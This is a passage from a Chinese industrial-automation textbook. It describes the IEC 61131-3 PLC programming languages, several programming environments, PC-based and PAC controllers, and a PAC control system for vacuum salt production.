61131-3中编程语言部分规范了4种编程语言,并定义了这些编程语言的语法和句法。这4种编程语言是:文本化语言2种,即指令表语言IL和结构化文本语言ST;图形化语言2种,即梯形图语言LD和功能块图语言FBD。由于要求控制设备完整地支持这4种语言并非易事,所以标准中允许部分实现,即不一定要求每种PLC都要同时具备这些语言。虽然这些语言最初是用于编制PLC逻辑控制程序的,但是由于PLCopen国际组织及专业化软件公司的努力,这些编程语言也支持编写过程控制、运动控制等其他应用系统的控制任务编程。 在IEC 61131-3标准中,顺序功能图SFC是作为编程语言的公用元素定义的。因此,许多文献也认为IEC 61131-3标准中含有5种编程语言规范,而SFC是其中的第三种图形编程语言。这里首先对SFC进行介绍。 一般而言,即使一个很复杂的任务,采用这五种编程语言的组合,是能够编写出满足控制任务功能要求的程序的。因此,IEC 61131-3标准中的5种编程语言也是充分满足了控制系统应用程序开发的需要。 4.5.1 顺序功能图 顺序功能图最早由法国国家自动化促进会提出。它是针对顺序控制系统的控制调节和过程,提出的一套表示逻辑控制功能的方法。该方法精确严密、简单易学,因此很快就被广大的设计人员接受,并被纳入一些国家和国际组织的标准。 顺序功能图把一个程序的内部组织加以结构化,在保持其总貌的前提下将一个控制问题分解为若干可管理的部分。它由3个基本要素构成:步(Steps)、动作块(Action Blocks)和转移(Transitions)。每一步表示被控系统的一个特定状态,它与动作块和转移相联系。转移与某个条件(或条件组合)相关联,当条件成立,转移前的上一步便处于非激活状态,而转移至的那一步则处于激活状态。与被激活的步相联系的动作块,则执行一定的控制动作。步、转移和动作块这三要素可由任意一种IEC编程语言编程,包括SFC本身。图4.11所示为用西门子S7-GRAPH编辑的SFC程序(S7-GRAPH与IEC 61131-3标准中的SFC还是有一些不同)。 图4.11 用西门子S7-GRAPH编辑的SFC程序 采用SFC编程的关键是将控制任务分解为一系列符合IEC标准的步、确定步转换的条件以及在每个步要执行的动作。这些步可以包括单一序列、选择序列、并行序列或它们的组合。在采用SFC编程时,步既包含实现控制功能所要经历的状态(过程)及在这些步所要执行的控制动作,也可以包括控制系统出现故障、异常或程序本身出错时所对应的状态,在这些步中,可以进行异常处理,处理完成后,状态可以转移到初始步或某个指定的步。 一般只有中、高档的PLC才支持SFC编程,而且,SFC程序占用资源较多,程序的执行效率也较低。 4.5.2 梯形图语言 梯形图语言是从继电器-接触器控制基础上发展起来的一种编程语言,其特点是易学易用,历史悠久。特别是对于具有电气控制背景的人而言,梯形图可以看作继电逻辑图的软件延伸和发展。尽管两者的结构非常类似,但梯形图软件的执行过程与继电器硬件逻辑的连接是完全不同的。 IEC 61131-3标准定义了梯形图中用到的元素,包括电源轨线、连接元素、触点、线圈、功能和功能块等。 (1)电源轨线—电源轨线的图形元素也称为母线。它的图形表示是位于梯形图左侧和右侧的两条垂直线。在梯形图中,能流从左则电源轨线开始,向右流动,经过连接元素和其他连接在该梯级的图形元素到达右电源轨线。 (2)连接元素—是指梯形图中连接各种触点、线圈、功能和功能块及电源轨线的线路,包括水平线路和垂直线路。连接元素的状态是布尔量。连接元素将最靠近该元素左侧图形符号的状态传递到该元素的右侧图形元素。 (3)触点—是梯形图的图形元素。梯形图的触点沿用电气逻辑图的触点术语,用于表示布尔变量的状态变化。触点是向其右侧水平连接元素传递一个状态的梯形元素。按静态特性分,触点可分为常开触点和常闭触点。常开触点在正常工况下,触点断开,状态为0;常闭触点在正常工况下,触点闭合,其状态为1。此外,在处理布尔量的状态变化时,要用到触点的上升沿和下降沿。 (4)线圈—是梯形图的图形元素。梯形图的线圈也沿用电气逻辑图的线圈术语,用于表示布尔量状态的变化。线圈是将其左侧水平连接元素状态毫无保留地传递到其右侧水平连接元素的梯形图元素。在传递过程中,将左侧连接的有关变量和直接地址的状态存储到合适的布尔量中。线圈按照其特性可分为瞬时线圈、锁存线圈和跳变线圈等。 (5)功能和功能块—梯形图编程语言支持功能和功能块的调用。 图4.12所示为用KW公司的MULTIPROG编程软件编写的梯形图程序,该梯形图中就包括IEC 61131-3标准中的一些常用梯形图编程图形元素。 图4.12 利用KW软件梯形图编程工具编写的控制程序 4.5.3 功能块图 功能块图编程语言是将各种功能块连接起来实现所需控制功能。功能块图编程语言源于信号处理领域。功能块图编程语言是IEC 61499标准的基础。功能块图语言在过程控制中的应用更加广泛。它用一系列相互连接的图形块表达功能、功能块和程序的行为,就如同在电子电路图常见的一样。也可以将它想象为用许多处理元件之间的信号流量图来描述一个系统的行为。功能块图编程语言的图形符号由功能、功能块和连接元素组成。 功能块图编程语言可以通过使用跳转、返回和反馈等元素实现对程序执行的控制。跳转分为无条件跳转和有条件跳转。返回分为条件返回和无条件返回。反馈并不改变执行控制的流向,但它影响下次求值中的输入变量。 图4.13是一个功能块图的应用实例(用4.6节介绍的MULTIPROG编程软件所编辑),图4.14是该实例的内部网络结构。该实例描述了一个水箱液位控制实现。当实际液位测量值小于等于所设定的最小液位时,输出一个ON信号;当测量值大于等于最高液位时,输出一个OFF信号。当然,由于液体不可能同时低于最低位和高于最高位,程序中用“RS”或“SR”功能块都可以。 图4.13 功能块图的应用实例 图4.14 功能块图的内部网络结构 4.5.4 结构化文本语言 结构化文本语言(ST)是高层编程语言,类似于PASCAL编程语言。它不采用底层的面向机器的操作符,而是采用高度压缩的方式提供大量抽象语句来描述复杂控制系统的功能。一般而言,它可以用来描述功能、功能块和程序的行为,也可以在SFC中描述步、动作块和转移的行为。相比较而言,它特别适合定义复杂的功能块。这是因为它具有很强的编程能力,可方便地对变量赋值,调用功能和功能块,创建表达式,编写条件语句和迭代程序等。结构化文本语言编写的程序格式自由,可在关键词与标识符之间的任何地方插入制表符、换行符和注释。它还具有易学易用、易读易理解的特点。在拥有了更多高级编程语言的特点时,它也失去了一些面向机器的操作符的特点,特别是结构化文本语言编写的程序执行效率较低,因为源程序要编译为机器语言才能执行。 熟悉高级编程语言工程师会喜欢用结构化文本编程语言,用该语言编程的程序与梯形图程序相比十分的简捷。图4.15所示为在施耐德Unity Pro XL编程环境下编写的一段程序,该程序的功能是判断当前的时间属于哪个时间区间(例如,可以定义期间A的时间段为0:00~1:30)。程序中首先取得PLC的系统时钟,这里要注意数据格式的转换。当前时间的小时存储在变量SysHour,分钟存储在变量SysMin。然后定义了衍生功能块“PhaseIs”,该功能块的代码也是采用用结构化文本语言编写见图4.15(a)。在“变量和FB实例”中再定义该衍生功能块实例“IsZ1Ja”。然后在整个项目的某个程序中就可以通过对该功能块实例的调用得到判断结果,见图4.15(b)。可以看到,这里的代码非常简捷,如果用梯形图编写同样的功能,程序看起来会比较繁杂,可读性也差。读者若感兴趣不妨自己尝试一下,会对这两者编程语言有更加深刻的体会。 图4.15 用结构化文本语言编写控制程序 4.5.5 指令表语言 指令表编程语言是一种主要流行于欧洲和日本的低级语言,与汇编语言相似。指令表语言不必通过编译和连编,就可以下载到PLC的CPU中去。IEC 61131-3指令表编程语言吸收和借鉴了PLC厂商的指令表语言长处,并在此基础上形成了一种标准语言,可用来描述功能、功能块和程序的行为,也可在SFC中描述动作、转移的行为。 指令表编程语言由一系列指令组成。每条指令均占一行,指令由操作符及紧跟其后的操作数组成。对于多于一个的操作数,可用逗号分隔。IEC 61131-3标准对指令表编程语言进行了扬弃,采用功能和功能块,精简了指令,使用数据类型的超载属性等,使编程语言更简单灵活。其主要有以下特点: · 采用功能和功能块调用,使原有的指令集简化到只有20多个指令。 · 数据类型的超载属性使运算变得方便。传统的PLC指令对不同数据类型的运算要用不同的指令,例如西门子S7300/400PLC的指令中,对整数加、双整数加与浮点数加运用是用3个指令实现的。而IEC 61131-3标准采用相同指令实现。 · 采用圆括号可以方便程序块的组合,并实现主控指令。此外,有条件转移和返回指令等也可用圆括号的方式实现。 · 对微分类指令,采用边沿检测属性的方法,简化了指令集。 · 数据传送指令可直接用赋值功能MOVE实现。 · 设置时间类型文字和数据类型,使定时器定时设定信号的输入变得简单。 · 数据存储也变得简单。 · 程序的结束不再需要END标志。 4.6 基于IEC 61131-3标准的编程软件 IEC 61131-3标准是一个强有力的、灵活的、可移植的、开放性的工业控制编程语言国际标准。目前,欧美等西方国家都致力于IEC 61131-3标准的推广与应用,市场上基于这个标准的产品较多,如加拿大ICS Triplex公司的lSaGRAF、德国KW公司的MULTIPROG、德国Infoteam的OpenPCS、德国3S公司的CoDesys等。这些软件的开发商都不生产控制系统硬件产品,而是专著于IEC 61131-3标准的控制系统编程环境开发。这也是这些产品都具有很好的移植功能,适合多种软、硬件平台的原因之一。 传统的PLC厂商近年来也加大了对IEC 61131-3标准的支持,它们的编程软件中已经融入了更多的IEC 61131-3元素。在众多的PLC制造商的编程软件中,相比较而言,施耐德公司的PLC编程软件Unity Pro系列对IEC 61131-3标准支持度较高。它可以对施耐德公司的Atrium、Premium、M340以及Quantum自动化平台进行编程,支持IEC 61131-3标准的5种编程语言。Unity Pro有丰富的面向不同行业和应用的功能块,如过程控制功能块库可以用来建立过程回路控制;通信功能块库可以将PLC的通信程序与用于人机界面的应用程序结合起来;诊断功能块库除可以完成执行器监视和信号组监视外,还可以用于主动式诊断、反应式诊断、连锁诊断、过程控制条件诊断和动态诊断等。“系统”功能块库具有估算扫描时间以及若干个系统时钟的有效性、SFC程序段的监视和系统状态显示等功能。此外,用户还可以用各种语言编写面向特定行业的功能块,扩展和丰富功能块库。其图形编程界面如图4.16所示。 图4.16 Unity Pro XL的界面 近年来,国内也有许多公司致力于基于IEC 61131-3标准的编程系统的开发,如北京亚控科技、浙大中自、大连理工大学计控研究所等都自行开发且拥有自主知识产权的编程系统,已经达到了较高的技术水平。 以下对MULTIPROG、OpenPCS、和CoDesys编程软件做简单介绍。 4.6.1 MULTIPROG MULT AIPROG是一个标准的编程系统,可用于根据IEC标准设计的PLC以及传统的PLC。其图形开发界面如图4.17所示。它基于IEC 61131-3标准,并且包括了IEC特征的全部范围。 这个编程系统基于现代的32位Windows技术,提供了便捷的处理,包括缩放、拖曳和可对接窗口。系统允许处理IEC配置元素,允许包含库,并提供了一个功能强大的调试系统。对于MULTIPROG,所有的功能都可以通过菜单访问,并且,只需要用几个对话框就可以建立一个工程模板,然后可以立即开始开发应用程序。 编程系统包括一个独立于PLC的内核,用于运用各种IEC编程语言编程。每个编程语言的编辑器都提供了一个编辑向导,使得插入关键字、语句、操作符、功能和功能块时尽可能地快而且容易。编辑向导也可以用于声明数据类型。适应于不同PLC的专用部分完善了独立内核。 图4.17 MULTIPROG编程系统 MULTIPROG支持所有IEC 61131-3定义的编程语言,程序设计人员能够在5个标准化编程语言FBD、LD、IL、ST和SFC之间进行选择,或者混合使用文本和图形化编程语言。MULTIPROG其他的特点还包括: · 工具包可用来调整用户特有的运行控制系统。 · 能够根据用户程序的大小进行联机改变。 · MULTIPROG可以使用多种语言。用户界面可以使用德语、英语、法语、西班牙语、日语和汉语。 · MULTIPROG可以在一个工程中支持具有多个控制器的分布式系统。 · 通过向导、交叉参考等强大的资源可以进行舒适并有效的编程。 · KW-Software通过兼容的版本,可以进行统一的MULTIPROG版本管理。 · 通过直观的功能处理,用户可以在自动控制工程内的各个阶段得到支持。 · 工程处理(符合国际标准IEC 61131-3)。 · 控制应用程序的创建。 · 控制器的参数化和配置。 · 代码生成(编译)和下装到控制器。 · 测试、试运行和服务。 · 文档丰富,方便用户在线索引和编程。 · 归档功能。 4.6.2 OpenPCS OpenPCS是一个遵从IEC 61131-3标准的编程系统,由德国Infoteam公司研发。其图形开发界面如图4.18所示,图中界面被划分为4个区域,分别是:①菜单和工具栏;②工程浏览器;③编辑窗口;④诊断输出窗口。OpenPCS开发环境包括两个部分:编程系统和运行系统。它的突出优点是运行系统提供开放式的标准C源代码,方便用户将运行系统移植到不同的操作系统和硬件平台。OpenPCS的编程系统包含几个独立的工具:工程浏览器、编辑器、应用文件、编译器,以及代码生成、测试和调试。 图4.18 OpenPCS编程系统 运行系统为开发人员提供标准C语言源代码,这些标准的C语言源代码包括以下功能模块:系统接口、通信接口、I/O接口、功能块接口等。由于这些功能模块是采用标准C语言编写的,因此开发人员可以根据需要选择C语言源代码,将运行目标机移植到特定的硬件平台和操作系统中,增加用户的功能块,定制应用的编程环境。 OpenPCS的运行系统支持通用代码(Universal Intermediate Code,UCODE)和本地代码(Native Code,NCODE)。UCODE采用解析运行机制(典型的如BASIC语言程序就是采用该机制运行),所以它的通用性是以降低速度为代价的。NCODE采用机器码被直接执行的方式,且没有调试信息被插入,因而其执行速度比UCODE快20~40倍。 为能在不同的软、硬件平台间移植IEC 61131-3标准的5种编程语言,OpenPCS的运行系统具有一个能解析IEC 61131-3标准IL语言的虚拟机。虚拟机核心是OpenPCS-RT-kernel,通过该虚拟机来模拟一个PLC或其他控制器设备的执行。 OpenPCS的主要特点是: · 模块化部件。 · 统一的接口。 · 统一的操作界面。 · 同时支持不同的编程语言。 · 能够交叉迁移。 · 从PLC返回文档。 · 多种在线调试功能。 · 独立于单片机类型的编程。 · 针对不同的单片机PLC程序都能得到编译。 4.6.3 CoDesys 德国3S公司开发的CoDesys系统是基于IEC 61131标准的编程系统,适用于工业控制器和PLC应用系统的编程工具,它支持IEC 61131-3标准中的5种语言。当系统中安装了CoDesys的SP-RTE编译器,并加载SERCOS控制卡后,计算机即相当于一台高性能的可编程控制器,不需要其他的组态软件就可以实现可视化。 CoDesys开发系统由3部分组成:用于控制器程序编写的编辑器、用于生成应用代码的集成编译器和数字诊断与试运行工具。 CoDesys中的softmotion还集成了运动控制功能,在SP-RTE系统中加载后,即使没有连接硬件,也能实现对程序的编译、设置断点、单步调试以及仿真。CoDesys是一款强大的自动控制软件,它也是一款模块化的软件,其自身带有大量的自动控制模块,几乎包含了自动控制程序所需的所有基本模块,如插补模块、电机的位置控制模块、速度控制模块和力矩控制模块等,不但如此,用户还可以根据程序的实际需要编写新模块,真正做到了功能强大而且非常人性化。 4.7 基于PC(PC-Based)的控制技术及应用 4.7.1 基于PC的控制技术产生 随着计算机的产生和发展,将计算机用于工业过程的测控也越来越多。计算机上有丰富的软、硬件资源,具有数学运算能力强大、运算速度快、网络通信实时性好、开放性好等特点,因而出现了大量基于计算机的测控系统,特别是许多中、小型测控/监控系统。这类系统的典型结构就是在计算机主板的插槽上安装各种不同类型的I/O卡件,这些卡件用电缆与端子板或信号调理卡连接,现场的测控设备通过硬接线与端子板或调理卡连接。在安全性要求高的场合,还需要各种信号隔离设备。测控软件可以采用通用软件(如Visual C++、Visual Basic、Visual Studio.net等)结合各种工控控件开发,也可以利用各种组态软件或专业测控软件(如LabView、LabWindows CVI等)开发。由于普通商用计算机并不适用于工业现场环境,其系统结构和性能与工业要求有一定的差距,因而许多厂家在商用的个人计算机基础上进行适应工业现场应用的改造和加固,从而产生了工业计算机(Industrial personal computer,IPC),简称工控机。而且随着不同的工业应用需要,也产生了各种结构形式的工控机产品,IPC以及基于IPC的应用技术得到了突飞猛进的发展。IPC一方面越来越多地承担着SCADA系统的人机交互和控制任务,另一方面,各种基于嵌入式计算机的应用也大量出现,这些嵌入式应用在许多设备的自动控制中广泛应用。虽然PLC作为传统主流控制器,具有抗恶劣环境、稳定性好、可靠性高、逻辑顺序控制能力强等优点,在自动化控制领域具有不可替代的优势。但PLC也有明显的不足:封闭式架构、封闭式软、硬件系统、较差的开放性、不同产品不兼容、编程语言不统一。这些都造成了PLC的应用壁垒,也增加了用户维修的难度和集成成本。而脱胎于PC的IPC,具有价格相对低廉、结构简单、开放性好、可靠性高、环境适应能力强等特点。因此,IPC除了可以用于监控系统的人机界面主机外,也可以作为一些小的监控系统的控制主机和人机界面。此外,由于IPC的功能越来越强大,软件资源极其丰富。因此,首先产生了所谓软PLC(Soft PLC,也称为软逻辑SoftLogic)的概念,其基本思想如图4.19所示。即利用PC的部分资源来模拟PLC的CPU的功能,在PC上运行PLC的程序。软PLC综合了计算机和PLC的开关量控制、模拟量控制、数学运算、数值处理、网络通信、PID调节等功能,通过一个多任务控制内核,提供强大的指令集、快速而准确执行控制任务。 图4.19 软PLC的基本原理(从PLC控制到软PLC控制) 随着对软PLC的认识深入及控制技术的发展,进一步产生了基于PC(PC-Based)的控制概念。基于PC的控制一定要是一个开放的系统,这一点在硬件上比较容易实现,因为IPC本身就与PC兼容。而在编程软件上,基于PC的控制目前统一性还较差,主要有基于C语言的编程和采用梯形图等编程语言编程。但是,随着IEC 61131-3标准的普及,基于PC的控制编程软件逐步采用IEC 61131-3的5种国际标准语言(LD、SFC、FBD、IL、ST),而且这方面的应用也是越来越多。 软PLC控制系统性/价比较高,因为计算机上的通信接口要比PLC等专有控制系统的要便宜很多,如以太网卡,PLC的以太网通信适配卡价格一般在6000元以上,而PC的主板多数集成以太网接口;计算机显示器的显示效果也比一般的触摸屏要好得多,而且价格也便宜;此外,在一台计算机上集成控制功能和人机界面,系统整体性能也有明显的提高,计算机上的内存之大也是PLC等无法比拟的。 4.7.2 基于PC的控制技术的发展 1. 传统基于PC的控制技术的局限性 与传统的PLC控制技术相比,采取软PLC控制技术虽然有其一系列的优点,但同时也存在以下问题: (1)PC的可靠性要比PLC差。 (2)PLC的CPU上运行用户的控制应用程序,无其他任务在运行,因此实时性可以得到保证。PC上往往运行许多任务,控制程序的实时性难以得到保证。 (3)采用软PLC与“集中管理、分散控制”的思想是相矛盾的,因为软PLC将人机界面、管理与控制功能都集中在PC上,这虽然有利于降低成本,但是这种方式并不合理,造成了风险集中。 (4)随着PLC价格的下降,这种控制方式在成本上的优势也在减弱。 虽然存在上述问题,但软PLC毕竟是一种很好的思想,特别是反映了控制系统走向开放性的要求和呼声。为了克服软PLC控制技术的不足,出现了基于PLC技术的基于PC的控制。这种控制方式与软PLC控制最大的不同是采取了独立的硬件CPU,控制程序在该CPU上运行,而不是在IPC上运行。这种控制方式仍然保持系统的开放性,且融合了PLC控制与PC的优点。此外,一些传统的PLC生产厂家也在逐步将PLC的功能PC化,生产出部分基于PC控制产品。与此同时,一些传统生产工控机和板卡的厂家也开发出基于PC的控制产品,这些都推动了该项技术的应用和发展。 这种新型的基于PC的控制通常不再像IPC那样,以机箱加主板为主体结构,再搭配诸如A/D、D/A、DI/DO等不同功能I/O板卡来组成控制系统,而是一个独立的基于嵌入式PC技术的专用系统,因此比较适合小型SCADA系统。这类产品有中国台湾泓格I-8000系列、Advantech的ADAM-5510等。其主机通常是40MHz或更高主频的CPU,操作系统为厂家自行开发的与DOS兼容的系统。如I-8000系列的操作系统为MiniOS7,而ADAM-5510的操作系统为ROM DOS。编程环境是基于PC的标准C语言程序,其程序开发过程与PLC较相似:首先在PC上编写用户程序,将其编译好后传送到主机内RAM上,再让其脱机运行。另外,为使其具备PLC的优势特性,一些基于PC的控制产品也可使用梯形图编程,如泓格ISaGRAF控制器。这类产品从外形上看,与模块式PLC极其相似。但在系统总线上,与传统PLC有不少不同。如泓格科技的一些产品其I/O模块与CPU模块的通信时基于串行通信,造成数据采样速率较低,并不适合在实时性要求较高的场合应用。此外,由于有些产品采用C语言编程,程序开发起来比较麻烦,特别是C语言并不适合处理逻辑控制,因而这类系统的应用并不广泛。 2.可编程自动化控制器(PAC) 在基于PC的控制中,软PLC控制的应用目前远远少于基于PLC技术的PC-Based控制。而且这种基于PLC技术的PC-Based控制已经逐步演变为一个新的控制技术和产品—可编程自动化控制器(PAC)。 2004年美国著名咨询公司ARC的研究主管C. Resnick在ARC网站上发表一篇名为“可编程自动化控制器PAC:一类新型系统已脱颖而出”的简短论文,文中给出PAC的定义如下: (1)具有多范畴的功能性,在一个平台上可实现包括逻辑和顺序控制、运动控制、驱动控制和过程控制的功能。 (2)具有单一多专业的开发平台,运用共用的变量标签(tagging)和统一数据库。 (3)具有开放、模块化体系结构,适用于从工厂自动化到流程工业的单元操作。 (4)采用事实上的网络接口、编程语言、安全等各种工业标准,使异型和异构系统间能实现数据交换。 目前的PAC产品主要制造商可分为2类:第一类是传统的PLC制造商。由于PAC的推出必然要挑战传统PLC产品的0市场占有率,因此,传统的PLC制造商也对其PLC产品进行一定的改造,以适应这种调整。如GE公司的PACSystem系统,可以说它是PLC 90系列的升级换代;罗克韦尔公司也宣称其ControlLogix系统属于PAC。第二类是从事工业控制计算机及工控卡件生产商,典型的如中国台湾研华公司。这些公司长期从事工控相关的配件生产,无法进入主流的工控产品市场。而IEC61131-3标准的制定和控制系统开放性的要求使得它们看到了进入控制器市场的机会,顺势推出了PAC产品。图4.20所示分别为中国台湾泓格科技公司的PAC控制器和研华公司的ADAM-5550 PAC控制器。 图4.20 两种典型的PAC控制器 PAC控制解决方案可实现工厂和OEM厂商都需要的优点: (1)提高生产率和操作效率—一个通用、轻便控制引擎和综合项目开发平台允许快速地开发、实施和移植;且由于它的开放性和灵活性,确保了控制、操作、企业级管理系统的无缝集成,优化了工厂流程。 (2)降低操作成本—使用通用、标准架构和网络,降低了操作成本,让工程师们有了更大的选择余地,而不是专有产品和技术,以实现控制系统的最佳性价比。用户只需在一个统一平台和开发环境上开发和培训,而不是几种平台,降低了开发和维护成本。系统的开放性和标准化方便用户程序的移植。 (3)使用户对其控制系统拥有更多控制力—用户拥有更多灵活性来选择适合每种特殊应用的硬件和编程语言以及系统升级。 3. 典型PAC产品 1)倍福(Bckhoff)基于PC控制解决方案 1986年,德国Beckhoff 推出第一款基于PC的控制器,经过多年发展,该公司已成为该领域著名的企业。该公司所生产的工业PC、现场总线模块、驱动产品和TwinCAT自动化软件构成了一套完整的、相互兼容的控制系统,可为各个工控领域提供开放式自动化系统和完整的解决方案。特别是一些PLC或PC较难解决的工控应用,可以利用该公司的基本PC的解决方案加以解决。Beckhoff的工业PC同时具备基于开放式标准的高质量组件和独特的机箱结构设计,满足各种控制需求。嵌入式PC是一种模块化工业PC,外形更为小巧,适用于DIN导轨安装。这些工业PC产品十分适用于对可靠性和坚固性要求较高的场合。在软件方面,TwinCAT(The Windows Control and Automation Technology,基于Windows 的控制和自动化技术)自动化软件是控制系统的核心部分。TwinCAT 自动化软件在单个软件包里集成了带PLC、NC、CNC和机器人实时操作系统的实时控制系统。所有Beckhoff控制器都采用TwinCAT进行编程,符合全球公认的IEC 61131-3编程标准。该软件集成Microsoft Visual Studio平台,使得采用IEC 61131-3、C/C++进行编程调试变得更加便利,不同语言编写的功能块相互间能够交换数据和互相调用。TwinCAT 3还可以提供C/C++、C#、VB.NET编程语言至 MATLAB/Simulink 的链接。为提高自动化项目的开发效率,TwinCAT 3改善了IEC 61131-3的编程环境,并加强了编程的友好性、实用性和调试功能,如在线监控、有条件的断点等。 2)中国台湾研华科技PAC 中国台湾研华科技推出了开放型PAC系统、紧凑型PAC系统、灵活型PAC系统和强固型PAC系统。 ADAM-5550是专门为需要工业 PC 运算性能和 PLC 耐用性的控制任务而设计的一款可编程自动化控制器。ADAM-5550分别采用AMD Geode GX533 CPU和ARM7 CPU,并带有丰富的控制功能,如看门狗定时器、电池备份RAM和强大的I/O支持。ADAM-5550支持在WinCE 5.0下的5种IEC 61131-3标准编程语言,因此PLC用户可以使用自己熟悉的编程语言来开发控制策略。ADAM-5550采用强大的Multiprog KW软件和稳定的ProCon OS,因此它是当今市场中可编程自动化控制器的理想选择。通过使用可选的 HMI 软件和集成的VGA端口,用户就无须在自己应用中配置额外的SCADA PC。这种尺寸紧凑、功能强大的PAC非常适合从设备自动化到 SCADA等各种应用。 ADAM-5550、UNO-2100、UNO-3000和MIC-3000系列产品,可以提供双以太网接口、双USB,多个RS-232/RS-485端口等丰富的通信接口和CF卡接口,以满足不同客户的复杂系统整合需求。研华PAC解决方案采用高性能CPU和坚固的I/O的设计,完全满足要求高运算能力和高可靠性的应用需求。此外,ADAM-5550、UNO-2100和UNO-3000系列还采用了针对关键和恶劣环境的坚固机械和无风扇设计。 该系列产品同时满足PLC和PC要求的坚固可靠和强大运算性能两方面的要求。可支持Win CE5.0下软逻辑编程和控制,PLC用户可以使用自己熟悉的编程语言来开发控制策略。其主要技术特点有: · 可带或不带键盘/鼠标接口进行操作。 · Web Server和E-mail报警等远程监控。 · 远程维护,通过ftp Server。 · 支持Modbus RTU和Modbus TCP(Server/Client)协议。 · 支持OPC Server。 · 支持SQL 数据库。 · 支持 SD 扩展存储I/O模块。 · 支持AMoNet主站模块。 · 支持运动控制模块。 · 支持确定性I/O。 · 支持远程I/O。 研华公司的所有PAC平台都嵌入KW SoftLogic(软逻辑)内核,实现组态软件与研华PAC的无缝整合方案。SoftLogic内核完全兼容IEC-61131标准。它同时支持LD、FBC、SFC、ST、IL编程语言。用户可以通过编程组态一次定义变量实现数据库共享,并且很容易的使用此工具实现多种控制应用。 3)西门子基于PC控制解决方案 在所有的传统PLC制造商中,西门子推出了最全面和完整的基于PC的控制产品和方案。SIMATIC WinAC是西门子基于PC的自动化控制产品,从功能上和产品系列上与其他基于PC的控制产品相比均有所区别。WinAC不是简单地将PLC替换为PC,而是将PLC 和PC的功能完美结合,包括控制功能、通信功能、可视化功能、网络功能及工艺技术等功能,产品包括WinAC插槽型、WinAC实时型、WinAC基本型和WinAC嵌入型等。 4)美国Opto 22 PAC Opto 22 SNAP PAC控制器包括底板安装的 R 系列控制器及独立安装的 S 系列控制器,分别满足不同的应用要求。Opto 22为其PAC产品配备了软件开发产品PAC Project Basic 和 Professional,它们是专门用于 Opto22 的SNAP PAC系列控制器的集成软件开发包。所有的SNAP PAC 出售时,PAC Project Basic 免费附带的,包括 PAC Control Basic(基于流程图的编程工具)以及 PAC Display Basic(HMI开发和运行应用程序)。要得到更高级的应用,OPC、冗余链接、网络分段或者原来的Opto22 控制系统的升级,就要使用PAC Project Professional,它提供更多的功能,包括 OPC 服务器和 Opto 22 FactoryFloor程序导入转换。 SNAP PAC S系列控制器是独立的控制器,适用于分布的控制系统应用,I/O 点数多或以太网络结构复杂。当前 PAC S 系列包括 SNAP-PAC-S1,具有 32 位多任务处理器,带浮点运算单元协处理器。系统配置32MB RAM, 16MB 闪存,8MB 电池后备 RAM。SNAP-PAC-S1 提供两个独立的、自适应10/100Mbps 的以太网接口。使用 PAC Project Professional可以进行组态,形成双以太网口的冗余以太网链路网段,也利用双网口进行网络分段,将控制网和监控网分开。系统包括一个 RS-485 口,用于 I/O 通信或者与其他的RS-485设备通信。两个RS-232口,其中之一提供握手控制信号,用于连到有线的或无线的调制解调器或其他的网络设备。另外还支持点对点协议(PPP),通过串行或者PSTN(公共电话交换网络)线构成TCP/IP网络。 SNAP PAC R 系列控制器是安装在 I/O底板上的控制器,设计用于单元控制以及小于128 点的系统。当前,PAC R系列包括 SNAP-PAC-R1 和 SNAP-PAC-R2控制器。每个底板安装的控制器都体积紧凑、价格便宜。SNAP-PAC-R1 和 SNAP-PAC-R2各自具有两个独立的、自适应的10/100Mbps 以太网接口,可以用于网络分段或以太网冗余链接,允许PAC R系列控制器扩展到较大型的系统或作为PAC S系列分布式系统的 I/O 单元。SNAP-PAC-R1和SNAP-PAC-R2各自具有一个 32 位多任务处理器,并带浮点协处理器。系统配置16MB RAM,8MB 闪存,以及 2MB 电池后备 RAM。通信接口有一个 RS-232口,带完全的握手控制信号。 4.8 PAC在真空制盐过程控制中的应用 4.8.1 真空制盐工艺过程与控制要求 1.工艺过程 真空制盐生产装置是利用多效密闭容器进行降压蒸发,充分利用上一效的二次蒸汽来加热下一效加热室内的原料卤水,在末效收集二次蒸汽经大气式混合冷凝器冷却形成真空,在各效蒸发罐产生压力阶梯。为了保证各效的液位恒定,每一效的加料在下循环管进行;每一效转料由上一效的盐脚转至下一效的循环管,最后在末效的盐脚排出,整个系统不断运行实现真空蒸发制盐。 2.控制要求 生产工艺上对主要控制点的要求有:Ⅰ至Ⅳ效蒸发罐的液位控制、进Ⅰ效加热室的压力控制、兑卤流量控制、卤水预热的温度控制等,以上控制为单回路PID调节;定时冲洗装置(指对二次蒸汽的捕抹器及变送器取压口)能进行手、自动两种状态控制,并且自动状态时由程序执行;远程手操器及流量的累积等。 4.8.2 真空制盐控制系统总体设计 1.系统组成 该真空制盐生产装置,其I/O点数为70个,具体点数为:模拟量输入AI(包括铂热电阻信号)为45个,模拟量输出AO为9个,开关量输出DO为16个。根据上面提出的具体的控制要求及所采用的设备稳定性、性价比等原则进行综合考虑,采用中国台湾研华科技的PAC产品ADAM-5510KW控制器作为下位机设备、研华的IPC-610工控机作上位机,上、下位机采用RS-485串口通信。整个系统属于由上、下位机构成的分布式控制系统,具有安全、可靠的特点。 ADAM-5510KW控制器是基于PC-Based的软逻辑控制器,它有自身的CPU、ROM(系统使用)、SRAM(内存)、Flash Memory(存放文件),内置看门狗电路、实时时钟和多种通信方式的通信口、电源模块等。根据系统的I/O点数,使用ADAM-5017、ADAM-5024、ADAM-5068与ADM-4024等模拟与数字量I/O模块作为数据采集输入通道与控制输出通道。 上位机监控中心配置操作站和打印机。上位机监控界面采用组态王KingView开发,方便操作人员实时监控。并在上位机上安装ADAM-5510KW的编程软件Multiprog对ADAM-5510KW进行编程、编译、下载及调试工作。 2.控制系统功能特点 (1)系统的扩展方便—增加本机I/O模块及远程I/O(通过COM4的 RS-485接口)ADAM-4000 ModBus模块时,只需在上位机的KW-Multiprog软件中添加相应模块的设备驱动程序,对一个5510KW控制器来说,最大可接本机8个I/O模块(对应槽号)和最多32个远程I/O节点数,总的I/O处理能力为160个模拟量及128个开关量。 (2)控制器的通信端口多,通信协议灵活—它有4个通信口和1个以太网口,即COM1~4和RJ-45接口。COM1/COM2通信口基于RS-232/485,通过标准的Modbus协议与上位机的组态软件通信。COM3为编程接口,用于程序调试与维护;COM4/RJ-45口为远程I/O模块扩展口,以Modbus协议扩展传输,它可使用作Modbus/RTU主站(如ADAM-4000)和Modbus/TCP 客户端(如ADAM-6000)连接远程I/O 模块。 